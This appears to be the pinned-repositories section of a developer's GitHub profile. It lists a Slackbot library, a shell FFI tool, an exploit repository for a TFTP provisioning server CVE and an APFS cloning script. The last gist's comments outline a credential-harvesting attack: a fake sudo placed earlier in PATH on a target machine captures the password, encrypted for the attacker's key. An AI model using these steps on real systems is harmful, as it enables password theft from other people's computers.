Pinned Loading

1. Easier more interesting Slackbots

   Python 1

2. cliFFI: call native shared library functions right from your shell

   C 5 1

4. Info and exploit for CVE-2023-29930: blind file read/write in Genesys TFTP provisioning server configuration

   Python 1

5. 3

   # Optionally use apfs-clonechecker to check for clones before recloning, useful if you are rerunning the script

   4

   export do_clone_check=${do_clone_check:-1}

   5

   export cleanup=${cleanup:-1}

6. 1

   #step 1: generate an rsa public/private keypair, and write your public key into the script below

   2

   #step 2: put this script onto the computer you are attacking, make it executable, and ensure it has higher PATH priority than real sudo

   3

   #step 3: after you obtain the encrypted password, decrypt it with cat .penc | openssl rsautl -decrypt -inkey your_key.priv

   4

   #note that you could easily modify to spoof other password taking utils like sudosh or su